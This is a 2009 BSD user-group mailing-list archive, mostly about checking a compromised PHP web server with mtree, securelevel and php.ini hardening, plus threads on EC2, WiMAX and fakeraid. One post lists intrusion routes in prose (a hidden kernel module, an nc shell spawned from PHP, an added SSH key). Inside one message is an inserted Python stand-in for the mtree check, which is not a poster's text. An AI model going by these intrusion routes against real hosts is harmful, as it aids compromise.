Well if it really is keeping you up at night you can do the following:

1: reinstall the box from cds, feel free to make your own if you want
2: only install binaries that you have already checksummed on your system
3: set up a nms station and monitor all your traffic
4: host based IDS
5: rewrite all your php code in something safer, say Haskell.
6: learn all the things you don't know yet to do all of the above

This is a huge investment in time that does not advance the business or accept the fact that you may have a problem down the road and get on with your day. Security is like insurance, it's not how much I want, it's how much do I want to pay for. This does not mean you do not take reasonable precautions to minimize your risk, ie mtree, dir tree in temp, running apache/web in a zone and the list goes on. But before you start down the security rabbit hole set up a budget X dollars or Y hours for setup/training and Z hours for monitoring daily/weekly. Then do as much security as you can afford.

Thanks,

marc

--
Freedom is nothing but a chance to be better.
Albert Camus

From bonsaime at gmail.com Wed Mar 11 01:09:13 2009
From: bonsaime at gmail.com (Jesse Callaway)
Date: Wed, 11 Mar 2009 01:09:13 -0400
Subject: [nycbug-talk] version control for config files
In-Reply-To: <60131f920903081817q658d3023s63c61b93b3eab528@mail.gmail.com>
References: <22274220-1236537967-cardhu_decombobulator_blackberry.rim.net-1195934676-@bxe1146.bisx.prod.on.blackberry> <60131f920903081817q658d3023s63c61b93b3eab528@mail.gmail.com>
Message-ID:

On Sun, Mar 8, 2009 at 9:17 PM, H. G. wrote:
> On Sun, Mar 8, 2009 at 2:45 PM, wrote:
>>
>> Here at ticketmaster we use an inhouse piece that we released as
>> opensource. Called rubix
>
> Has it been renamed to "Spine"? ( http://code.google.com/p/spine-mgmt/ ) ?
>

They certainly seem to be related to each other in some fashion.

--
http://code.google.com/p/spine-mgmt/source/browse/trunk/docs/example_spine_config/Utils/restore-rubix

I'm kinda liking those one-liner config files and will have to give this a run.
-jesse

From akosela at andykosela.com Wed Mar 11 04:01:29 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Wed, 11 Mar 2009 09:01:29 +0100
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To:
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49b4fba9.Jl2L6Zv35eHa839q%akosela@andykosela.com> <49b5aab0.JrVJRC3wkvKL+jcc%akosela@andykosela.com>
Message-ID: <49b76fd9.LOQzqNyXd9L8+lXw%akosela@andykosela.com>

Matt Juszczak wrote:
>> Not really. mtree(8) by default takes into account mtime, so if you
>> rebuilt the system at any given time, you need to start from scratch
>> with the new fresh specification file.
>
> OK. Surely there's a way to check out a system where this procedure wasn't
> performed. I guess, potentially, using chkrootkit comparing sources
> compiled in /usr/src?

If you recompiled world it will now be definitely harder to ensure your machine has not been compromised. chkrootkit does not compare anything, but only checks for "known signatures" in system binaries, so it can help, but not in a way you think. Proper security policies must be implemented from scratch, involving certain things even *before* you put the system online. But I would just start from the point where you are now, i.e. make a fresh mtree(8) specification and monitor any files that change and suspicious system activity.

--Andy

From mikel.king at olivent.com Wed Mar 11 11:35:12 2009
From: mikel.king at olivent.com (Mikel King)
Date: Wed, 11 Mar 2009 11:35:12 -0400
Subject: [nycbug-talk] TowerStream
Message-ID:

Has anyone on the list ever worked with TowerStream? I would be interested in discussing off-list their quality and reliability.
Cheers,
Mikel King
CEO, Olivent Technologies
Senior Editor, Daemon News
Columnist, BSD Magazine
6 Alpine Court
Medford, NY 11763
http://www.olivent.com
http://www.daemonnews.org
http://www.bsdmag.org
skype: mikel.king
t: 631.627.3055
m: 646.554.3660
+------------------------------------------+
Do You know where your towel is?
+------------------------------------------+

From lists at kithalsted.com Wed Mar 11 15:02:08 2009
From: lists at kithalsted.com (Kit Halsted)
Date: Wed, 11 Mar 2009 15:02:08 -0400
Subject: [nycbug-talk] TowerStream
In-Reply-To:
References:
Message-ID:

I have a couple clients who keep talking about using them. I would be interested in seeing at least a summary of this discussion on-list.

Cheers,
-Kit

On Mar 11, 2009, at 11:35 AM, Mikel King wrote:
> Has anyone on the list ever worked with TowerStream? I would be
> interested in discussing off-list their quality and reliability.

From slynch2112 at me.com Wed Mar 11 12:22:37 2009
From: slynch2112 at me.com (Siobhan Lynch)
Date: Wed, 11 Mar 2009 12:22:37 -0400
Subject: [nycbug-talk] TowerStream
In-Reply-To:
References:
Message-ID: <49B7E54D.1030601@me.com>

On 3/11/09 11:35 AM, Mikel King wrote:
> Has anyone on the list ever worked with TowerStream? I would be
> interested in discussing off-list their quality and reliability.
>

We have a towerstream wimax link here.

-Trish

> Cheers,
> Mikel King
> CEO, Olivent Technologies
> Senior Editor, Daemon News
> Columnist, BSD Magazine
> 6 Alpine Court
> Medford, NY 11763
> http://www.olivent.com
> http://www.daemonnews.org
> http://www.bsdmag.org
> skype: mikel.king
> t: 631.627.3055
> m: 646.554.3660
> +------------------------------------------+
> Do You know where your towel is?
> +------------------------------------------+

From carton at Ivy.NET Wed Mar 11 18:07:56 2009
From: carton at Ivy.NET (Miles Nordin)
Date: Wed, 11 Mar 2009 18:07:56 -0400
Subject: [nycbug-talk] TowerStream
In-Reply-To: (Mikel King's message of "Wed, 11 Mar 2009 11:35:12 -0400")
References:
Message-ID:

>>>>> "mk" == Mikel King writes:

    mk> TowerStream?

no I haven't, but they've been around for quite a while and keep writing me. One of their competitors is Rainbow Communications. Towerstream will give you single-homed-to-Level3 transit as the only option. Rainbow can hand off to a VLAN in 25 Broadway, IIRC. (It was for a conference, and someone from NAC was helping us.)

Understand that it is not equivalent to a T1 if you are doing VoIP, because there currently seems to be no workable way to take advantage of the complicated QoS/CIR features built into their radio gear. It's not just towerstream that has this problem but also cable and (to a slightly lesser extent) dsl.

From nonesuch at bad-apples.org Wed Mar 11 18:39:55 2009
From: nonesuch at bad-apples.org (Mark Saad)
Date: Wed, 11 Mar 2009 18:39:55 -0400
Subject: [nycbug-talk] Kqemu and BSD
Message-ID: <49B83DBB.9070005@bad-apples.org>

Hello Talk
  I was wondering who is using Qemu with Kqemu support under *BSD. What do you think of it.
--
]Mark Saad[ mark at bad-apples.org

() ascii ribbon campaign - against html e-mail
/\ www.asciiribbon.org - against proprietary attachments

From matt at atopia.net Wed Mar 11 19:41:03 2009
From: matt at atopia.net (Matt Juszczak)
Date: Wed, 11 Mar 2009 19:41:03 -0400 (EDT)
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com>
Message-ID:

> Well if it really is keeping you up at night you can do the following:
> 1: reinstall the box from cds, feel free to make your own if you want

I'm still a bit confused. Most root kits overwrite your system binaries correct? So what would the negatives be to installing a 6.3-RELEASE system somewhere, somehow either checksumming or building an mtree of the files in /sbin, /usr/sbin, /bin, /sbin, etc. and comparing to the existing system (ignoring modification time of course). Shouldn't my FreeBSD 6.3-RELEASE system be identical in system binaries to any other 6.3-RELEASE system other than mtime?

-Matt

From mspitzer at gmail.com Wed Mar 11 23:48:21 2009
From: mspitzer at gmail.com (Marc Spitzer)
Date: Wed, 11 Mar 2009 23:48:21 -0400
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To:
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com>
Message-ID: <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com>

On Wed, Mar 11, 2009 at 7:41 PM, Matt Juszczak wrote:
>> Well if it really is keeping you up at night you can do the following:
>> 1: reinstall the box from cds, feel free to make your own if you want
>
> I'm still a bit confused. Most root kits overwrite your system binaries
> correct?
> So what would the negatives be to installing a 6.3-RELEASE system
> somewhere, somehow either checksumming or building an mtree of the files in
> /sbin, /usr/sbin, /bin, /sbin, etc. and comparing to the existing system
> (ignoring modification time of course). Shouldn't my FreeBSD 6.3-RELEASE
> system be identical in system binaries to any other 6.3-RELEASE system other
> than mtime?

it should be fine as long as you never patched anything, and that is its own issue. The real issue is not if you got rooted but how did you get rooted, if you did. Also I can own you out of /usr/local, php and friends are not in the base system. And it is also doable to root you with a Kernel Loadable Module that in kernel space you can do all sorts of games with to hide from the system. Or I get one of your php files to spawn off nc and give me a shell on the system. Another nice one is add a key to authorized_keys.

The thing is most of your exposure is your php website, how are you managing that? Much of the php code out there was not written by experts from MIT but by people who code in ee, think notepad but worse, and have never had any formal training in CS/Programming. Are you using any of their code? And I do not mean you but the modules you may pull in from ports or the internet.

Now if you read the rest of my note:

This does not mean you do not take reasonable precautions to minimize your risk, ie mtree, dir tree in temp, running apache/web in a zone and the list goes on. But before you start down the security rabbit hole set up a budget X dollars or Y hours for setup/training and Z hours for monitoring daily/weekly. Then do as much security as you can afford.

I specifically said mtree was a reasonable thing to do so please go do that. My main point was that it costs a lot to be "really" secure and are you sure you want to pay it, and even if you want to is it the best place to spend the money?

night,

marc

--
Freedom is nothing but a chance to be better.
Albert Camus

From jun at soum.co.jp Thu Mar 12 00:21:46 2009
From: jun at soum.co.jp (Jun Ebihara)
Date: Thu, 12 Mar 2009 13:21:46 +0900 (JST)
Subject: [nycbug-talk] Kqemu and BSD
In-Reply-To: <49B83DBB.9070005@bad-apples.org>
References: <49B83DBB.9070005@bad-apples.org>
Message-ID: <20090312.132146.45270190.jun@soum.co.jp>

From: Mark Saad
Subject: [nycbug-talk] Kqemu and BSD
Date: Wed, 11 Mar 2009 18:39:55 -0400

> I was wondering who is using Qemu with Kqemu support under *BSD.
> What do you think of it.

for NetBSD-4.0 & 5.0-RC1 by minoura at netbsd.
http://www.minoura.org/~minoura/kqemu-090125/

--
jun ebihara

From spork at bway.net Thu Mar 12 00:50:59 2009
From: spork at bway.net (Charles Sprickman)
Date: Thu, 12 Mar 2009 00:50:59 -0400 (EDT)
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com>
Message-ID:

On Wed, 11 Mar 2009, Marc Spitzer wrote:
> The thing is most of your exposure is your php website, how are you
> managing that? Much of the php code out there was not written by
> experts from MIT but by people who code in ee, think notepad but
> worse, and have never had any formal training in CS/Programming. Are
> you using any of their code? And I do not mean you but the modules
> you may pull in from ports or the internet.

I am very new to php "security", but even this little doc from the Joomla site has what appear to be some very good suggestions to eliminate some of the more common threats:

http://docs.joomla.org/Security_Checklist_2_-_Hosting_and_Server_Setup#Configuring_PHP

I found this comment rather interesting:

-----
Don't use PHP safe_mode
Avoid the use of PHP safe_mode.
This is a valid but incomplete solution to a deeper problem and provides a false sense of security. See the official PHP site for an explanation of this issue.
-----

The "open_basedir" and "disable_functions" directives were new to me. They both look like they would be very sensible things to configure on any php installation.

Charles

> night,
>
> marc
> --
> Freedom is nothing but a chance to be better.
> Albert Camus
>

From akosela at andykosela.com Thu Mar 12 02:54:38 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Thu, 12 Mar 2009 07:54:38 +0100
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com>
Message-ID: <49b8b1ae.FQgG2OWBFhmYhRyU%akosela@andykosela.com>

Marc Spitzer wrote:
> And it is also doable to root you with a Kernel Loadable Module that
> in kernel space you can do all sorts of games with to hide from the
> system.

Kernel security level >= 1 will prevent that. It is usually safe to run at level 2 or even 3.

--Andy

From matt at atopia.net Thu Mar 12 02:56:32 2009
From: matt at atopia.net (Matt Juszczak)
Date: Thu, 12 Mar 2009 02:56:32 -0400 (EDT)
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49b8b1ae.FQgG2OWBFhmYhRyU%akosela@andykosela.com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com> <49b8b1ae.FQgG2OWBFhmYhRyU%akosela@andykosela.com>
Message-ID:

> Kernel security level >= 1 will prevent that. It is usually safe to run
> at level 2 or even 3.
>
> --Andy

I always run in 2. So I guess that helps me a little bit.
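The integrity check Matt proposed earlier in this thread (build an mtree of a pristine 6.3-RELEASE install and compare it to the suspect box, ignoring mtime) and Andy's advice to start from a fresh mtree(8) specification, as an added example that is not any poster's code: a small Python stand-in for the mtree comparison, with a constructed reference tree and a constructed "live" tree rather than real system files. The mtree(8) invocations quoted in the docstring are the real-tool equivalent; the script exists only to make the comparison logic visible and runnable offline.

```python
"""Added example, not code from any poster in this thread.

Stand-in for the mtree(8) workflow: record type, mode, size and a SHA-256
digest for every entry of a known-good tree, deliberately leaving out mtime,
then diff the suspect live tree against it. On FreeBSD the real tool does
roughly the same with
    mtree -c -k "type,mode,uid,gid,size,sha256digest" -p /bin > bin.spec
    mtree -f bin.spec -p /bin
The sample trees built by demo() are constructed, not real system files.
"""
import hashlib
import os
import shutil
import stat
import tempfile

# Keywords recorded per entry. "time" is intentionally absent, so a rebuilt
# or reinstalled binary with identical bytes compares clean.
KEYWORDS = ("type", "mode", "size", "sha256digest")


def _record(path):
    """Keyword dict for one path; size and digest only for regular files."""
    st = os.lstat(path)
    kind = "dir" if stat.S_ISDIR(st.st_mode) else "file"
    rec = {"type": kind, "mode": "%o" % stat.S_IMODE(st.st_mode)}
    if kind == "file":
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        rec["size"] = str(st.st_size)
        rec["sha256digest"] = h.hexdigest()
    return rec


def build_spec(root):
    """Walk root and return {relative_path: record}, like 'mtree -c'."""
    spec = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            spec[os.path.relpath(full, root)] = _record(full)
    return spec


def compare_specs(reference, live):
    """Diff live against reference; returns (changed, missing, extra).

    changed: present in both, but a recorded keyword differs
    missing: in the reference but gone from the live tree
    extra:   on the live tree only; this is how a file dropped outside the
             base system (/usr/local, /tmp) shows up when the spec covers it
    """
    changed = [p for p, ref in reference.items() if p in live
               and any(ref.get(k) != live[p].get(k) for k in KEYWORDS)]
    missing = [p for p in reference if p not in live]
    extra = [p for p in live if p not in reference]
    return sorted(changed), sorted(missing), sorted(extra)


def _populate(root, files):
    """Write the constructed sample tree {relpath: bytes} under root."""
    for rel, data in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(data)
        os.chmod(full, 0o555)


def demo():
    """Constructed scenario: pristine reference install vs. a suspect box."""
    base = {"bin/ls": b"#!/bin/sh\necho ls\n",
            "bin/ps": b"#!/bin/sh\necho ps\n",
            "sbin/init": b"#!/bin/sh\necho init\n",
            "sbin/mount": b"#!/bin/sh\necho mount\n"}
    suspect = dict(base)
    suspect["bin/ps"] = b"#!/bin/sh\necho PS\n"      # same size, bytes differ
    del suspect["sbin/mount"]                         # gone from the live box
    suspect["usr/local/bin/.x"] = b"#!/bin/sh\necho planted\n"  # outside base
    ref_dir = tempfile.mkdtemp(prefix="ref-")
    live_dir = tempfile.mkdtemp(prefix="live-")
    try:
        _populate(ref_dir, base)
        _populate(live_dir, suspect)
        # Touch init on the live box: mtime differs, bytes do not, so it
        # must NOT be reported. This is the "ignoring modification time" point.
        os.utime(os.path.join(live_dir, "sbin/init"), (0, 0))
        return compare_specs(build_spec(ref_dir), build_spec(live_dir))
    finally:
        shutil.rmtree(ref_dir)
        shutil.rmtree(live_dir)


if __name__ == "__main__":
    print(demo())
```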
From akosela at andykosela.com Thu Mar 12 03:01:29 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Thu, 12 Mar 2009 08:01:29 +0100
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To:
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com>
Message-ID: <49b8b349.0/dFxDB6FAIfe574%akosela@andykosela.com>

Charles Sprickman wrote:
> I found this comment rather interesting:
>
> -----
> Don't use PHP safe_mode
> Avoid the use of PHP safe_mode. This is a valid but incomplete solution to
> a deeper problem and provides a false sense of security. See the official
> PHP site for an explanation of this issue.
> -----

From php.ini:

; Safe Mode
;
; SECURITY NOTE: The FreeBSD Security Officer strongly recommend that
; the PHP Safe Mode feature not be relied upon for security, since the
; issues Safe Mode tries to handle cannot properly be handled in PHP
; (primarily due to PHP's use of external libraries). While many bugs
; in Safe Mode has been fixed it's very likely that more issues exist
; which allows a user to bypass Safe Mode restrictions.
; For increased security we recommend to always install the Suhosin
; extension.

> The "open_basedir" and "disable_functions" directives were new to me.
> They both look like they would be very sensible things to configure on any
> php installation.

There are some performance problems with using 'open_basedir' on FreeBSD. Google for that. Also if your application doesn't need it, disable 'allow_url_fopen'.
--Andy

From mterenzio at gmail.com Sat Mar 14 15:58:06 2009
From: mterenzio at gmail.com (Matthew Terenzio)
Date: Sat, 14 Mar 2009 15:58:06 -0400
Subject: [nycbug-talk] EC2 and FreeBSD
Message-ID: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com>

Amazon announced their "reserved instances" for EC2. I noticed a mention of FreeBSD in their FAQ:

Q: What operating system environments are supported?

Amazon EC2 currently supports a variety of operating systems including: RedHat Linux, Windows Server, openSuSE Linux, Fedora, Debian, OpenSolaris, Cent OS, Gentoo Linux, Oracle Linux, and FreeBSD. We are looking for ways to expand it to other platforms in future releases.

My understanding was that this wasn't happening until 8.0 release at earliest, which may be some time from now. Just a typo?

From pete at nomadlogic.org Sat Mar 14 16:21:23 2009
From: pete at nomadlogic.org (Pete Wright)
Date: Sat, 14 Mar 2009 13:21:23 -0700
Subject: [nycbug-talk] EC2 and FreeBSD
In-Reply-To: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com>
References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com>
Message-ID: <4FEB02E5-D9DC-45B3-A621-0CAEE3315D38@nomadlogic.org>

On 14-Mar-09, at 12:58 PM, Matthew Terenzio wrote:
> Amazon announced their "reserved instances" for EC2. I noticed a
> mention of FreeBSD in their FAQ:
>
> Q: What operating system environments are supported?
> Amazon EC2 currently supports a variety of operating systems
> including: RedHat Linux, Windows Server, openSuSE Linux, Fedora,
> Debian, OpenSolaris, Cent OS, Gentoo Linux, Oracle Linux, and
> FreeBSD. We are looking for ways to expand it to other platforms in
> future releases.
>
> My understanding was that this wasn't happening until 8.0 release at
> earliest, which may be some time from now. Just a typo?
>

oh that's pretty exciting.
i'm going to have to check that out on monday when i get to work (i don't have my ec2 account info w/ me :( ). we've been using the ec2 to do some scalability testing of our webapps and have been happily surprised with its performance...

-p

From chsnyder at gmail.com Sun Mar 15 10:05:22 2009
From: chsnyder at gmail.com (Chris Snyder)
Date: Sun, 15 Mar 2009 10:05:22 -0400
Subject: [nycbug-talk] EC2 and FreeBSD
In-Reply-To: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com>
References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com>
Message-ID:

On Sat, Mar 14, 2009 at 3:58 PM, Matthew Terenzio wrote:
> Amazon announced their "reserved instances" for EC2. I noticed a mention of
> FreeBSD in their FAQ:
>
> Q: What operating system environments are supported?
>
> Amazon EC2 currently supports a variety of operating systems including:
> RedHat Linux, Windows Server, openSuSE Linux, Fedora, Debian, OpenSolaris,
> Cent OS, Gentoo Linux, Oracle Linux, and FreeBSD. We are looking for ways to
> expand it to other platforms in future releases.
>
> My understanding was that this wasn't happening until 8.0 release at
> earliest, which may be some time from now. Just a typo?

Seems like a typo.

There are no FreeBSD AMIs (images) in the community list, so if anyone IS running it, they aren't sharing yet.

Chris Snyder
http://chxor.chxo.com/

From slynch2112 at me.com Sun Mar 15 13:36:20 2009
From: slynch2112 at me.com (Siobhan Lynch)
Date: Sun, 15 Mar 2009 13:36:20 -0400
Subject: [nycbug-talk] EC2 and FreeBSD
In-Reply-To:
References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com>
Message-ID: <49BD3C94.7020803@me.com>

On 3/15/09 10:05 AM, Chris Snyder wrote:
>
> Seems like a typo.
>
> There are no FreeBSD AMIs (images) in the community list, so if anyone
> IS running it, they aren't sharing yet.
>

I did a search through public AMIs via Elasticfox - and "bsd" does not show up anywhere as of yet.
-Trish

From kacanski_s at yahoo.com Mon Mar 16 11:27:09 2009
From: kacanski_s at yahoo.com (Aleksandar Kacanski)
Date: Mon, 16 Mar 2009 08:27:09 -0700 (PDT)
Subject: [nycbug-talk] issues with built in raid on Asus M3A79-T DELUXE
Message-ID: <508110.23824.qm@web53611.mail.re2.yahoo.com>

Hi,
I tried installation with FBSD 7.1 on Asus M3A79-T DELUXE with two SSD SATA drives. It works fine when bios is configured without SATA RAID 0/1/5/10, eg. ISA; AHCI. As soon as I engage raid, the BTX loader will try to load configuration, and box will recycle hard.
Any suggestions?

--Aleksandar (Sasha) Kacanski

From skreuzer at exit2shell.com Mon Mar 16 11:43:59 2009
From: skreuzer at exit2shell.com (Steven Kreuzer)
Date: Mon, 16 Mar 2009 11:43:59 -0400
Subject: [nycbug-talk] EC2 and FreeBSD
In-Reply-To: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com>
References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com>
Message-ID:

On Mar 14, 2009, at 3:58 PM, Matthew Terenzio wrote:
> Amazon announced their "reserved instances" for EC2. I noticed a
> mention of FreeBSD in their FAQ:
>
> Q: What operating system environments are supported?
> Amazon EC2 currently supports a variety of operating systems
> including: RedHat Linux, Windows Server, openSuSE Linux, Fedora,
> Debian, OpenSolaris, Cent OS, Gentoo Linux, Oracle Linux, and
> FreeBSD. We are looking for ways to expand it to other platforms in
> future releases.
>
> My understanding was that this wasn't happening until 8.0 release at
> earliest, which may be some time from now. Just a typo?

Seems like it was a mistake because it's not listed in the supported operating systems table anymore.

Also, FreeBSD 8 will not support Xen 3.0.3 or earlier. EC2 uses 3.0.3

--
Steven Kreuzer
http://www.exit2shell.com/~skreuzer
From chsnyder at gmail.com Mon Mar 16 11:53:24 2009
From: chsnyder at gmail.com (Chris Snyder)
Date: Mon, 16 Mar 2009 11:53:24 -0400
Subject: [nycbug-talk] EC2 and FreeBSD
In-Reply-To:
References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com>
Message-ID:

2009/3/16 Steven Kreuzer :
> Seems like it was a mistake because it's not listed in the supported operating
> systems table anymore.
> Also, FreeBSD 8 will not support Xen 3.0.3 or earlier. EC2 uses 3.0.3

Couldn't we run FreeBSD on ec2 as a vmware guest on top of Debian?

From mterenzio at gmail.com Mon Mar 16 11:53:56 2009
From: mterenzio at gmail.com (Matthew Terenzio)
Date: Mon, 16 Mar 2009 11:53:56 -0400
Subject: [nycbug-talk] EC2 and FreeBSD
In-Reply-To:
References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com>
Message-ID: <852b23f40903160853s312bdf94h2065fca950ea73d5@mail.gmail.com>

>
> Seems like it was a mistake because it's not listed in the supported operating
> systems table anymore.
>

I believe it's a mistake too, unless they have plans to make the newer version of Xen available soon.

But for the record, FreeBSD wasn't listed in that Operating Systems table you mention, it was in the Reserved Instances FAQ, and still is.

http://aws.amazon.com/ec2/faqs/#What_operating_system_environments_are_supported

From carton at Ivy.NET Mon Mar 16 15:11:42 2009
From: carton at Ivy.NET (Miles Nordin)
Date: Mon, 16 Mar 2009 15:11:42 -0400
Subject: [nycbug-talk] issues with built in raid on Asus M3A79-T DELUXE
In-Reply-To: <508110.23824.qm@web53611.mail.re2.yahoo.com> (Aleksandar Kacanski's message of "Mon, 16 Mar 2009 08:27:09 -0700 (PDT)")
References: <508110.23824.qm@web53611.mail.re2.yahoo.com>
Message-ID:

>>>>> "ak" == Aleksandar Kacanski writes:

    ak> As soon as I engage raid,

it's fakeraid.
http://linuxmafia.com/faq/Hardware/sata.html#fakeraid

you can use AHCI mode and geom instead, but if a drive dies you will probably have to do something manual to make the machine boot again.

From carton at Ivy.NET Mon Mar 16 15:12:41 2009
From: carton at Ivy.NET (Miles Nordin)
Date: Mon, 16 Mar 2009 15:12:41 -0400
Subject: [nycbug-talk] EC2 and FreeBSD
In-Reply-To: (Chris Snyder's message of "Mon, 16 Mar 2009 11:53:24 -0400")
References: <852b23f40903141258n555d9367se26dfa4d125a9e92@mail.gmail.com>
Message-ID:

>>>>> "cs" == Chris Snyder writes:

    cs> Couldn't we run FreeBSD on ec2 as a vmware guest on top of
    cs> Debian?

no

http://lists.xensource.com/archives/html/xen-users/2005-05/msg00549.html

netbsd has kept up with Xen more aggressively, so you might have luck getting bsd goodness squeezed into EC2 expensiveness there. but it sounds like freebsd is the one seriously trying to compete with linux performance, albeit only for extremely simple tasks like LAMP hosting, so I don't know if you're interested or not.

From spork at bway.net Tue Mar 17 01:47:07 2009
From: spork at bway.net (Charles Sprickman)
Date: Tue, 17 Mar 2009 01:47:07 -0400
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49b8b349.0/dFxDB6FAIfe574%akosela@andykosela.com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com> <49b8b349.0/dFxDB6FAIfe574%akosela@andykosela.com>
Message-ID: <10A22595-16C9-47F0-89C8-36DC9F941F7C@bway.net>

On Mar 12, 2009, at 3:01 AM, Andy Kosela wrote:
> Charles Sprickman wrote:
>
>> I found this comment rather interesting:
>>
>> -----
>> Don't use PHP safe_mode
>> Avoid the use of PHP safe_mode. This is a valid but incomplete
>> solution to
>> a deeper problem and provides a false sense of security. See the
>> official
>> PHP site for an explanation of this issue.
>> -----
>
> From php.ini:
>
> ; Safe Mode
> ;
> ; SECURITY NOTE: The FreeBSD Security Officer strongly recommend that
> ; the PHP Safe Mode feature not be relied upon for security, since the
> ; issues Safe Mode tries to handle cannot properly be handled in PHP
> ; (primarily due to PHP's use of external libraries). While many bugs
> ; in Safe Mode has been fixed it's very likely that more issues exist
> ; which allows a user to bypass Safe Mode restrictions.
> ; For increased security we recommend to always install the Suhosin
> ; extension.
>
>> The "open_basedir" and "disable_functions" directives were new to me.
>> They both look like they would be very sensible things to configure
>> on any
>> php installation.
>
> There are some performance problems with using 'open_basedir' on
> FreeBSD. Google for that.

I did find some info on that, and then I also found this:

http://www.hardened-php.net/suhosin/a_feature_list:realpath.html

"To stop all these attacks Suhosin replaces the realpath() function PHP uses with the one implemented by FreeBSD which was the most robust one at the time this patch was created."

So FreeBSD's realpath() is slow, but it is "more correct" I suppose.
> Also if your application doesn't need it, disable 'allow_url_fopen'.

That's a tough one... I know I've got some stuff that pulls in RSS feeds, need to look at how that's done.

Thanks,

Charles

> --Andy

Charles Sprickman
NetEng/SysAdmin
Bway.net - New York's Best Internet - www.bway.net
spork at bway.net - 212.655.9344

From akosela at andykosela.com Tue Mar 17 07:18:41 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Tue, 17 Mar 2009 12:18:41 +0100
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <10A22595-16C9-47F0-89C8-36DC9F941F7C@bway.net>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <8c50a3c30903102051x2e58f6devc48f0d95ecc3e17a@mail.gmail.com> <8c50a3c30903112048u69632b86gbdbe5dca7fd4bfe4@mail.gmail.com> <49b8b349.0/dFxDB6FAIfe574%akosela@andykosela.com> <10A22595-16C9-47F0-89C8-36DC9F941F7C@bway.net>
Message-ID: <49bf8711.9yxOPKmKuVThxOgY%akosela@andykosela.com>

Charles Sprickman wrote:

> So FreeBSD's realpath() is slow, but it is "more correct" I suppose.

The never-ending dilemma -- speed vs. stable & secure. On the one extreme we have Linux, and on the other OpenBSD. Both positions are not ideal IMHO. But only a rational mean, a harmony between speed and security, is the best approach. To me, FreeBSD is striving for this goal, but in this particular case the implementation was just too slow.

This approach was already known to the philosophy of Plato, where he was describing a mean between two extremes, 'peras' and 'apeiron'. Nature only works like that, so we should try to imitate Her.
--Andy

From skreuzer at exit2shell.com Wed Mar 18 10:14:48 2009
From: skreuzer at exit2shell.com (Steven Kreuzer)
Date: Wed, 18 Mar 2009 10:14:48 -0400
Subject: [nycbug-talk] Sun News Roundup
Message-ID:

Interesting morning for Sun Microsystems:

Today at CommunityOne in New York, Sun is announcing some Cloud-related stuff
http://www.tbray.org/ongoing/When/200x/2009/03/16/Sun-Cloud

Oh yeah, IBM may purchase Sun for 6.5 billion: http://tinyurl.com/cnjd7g

--
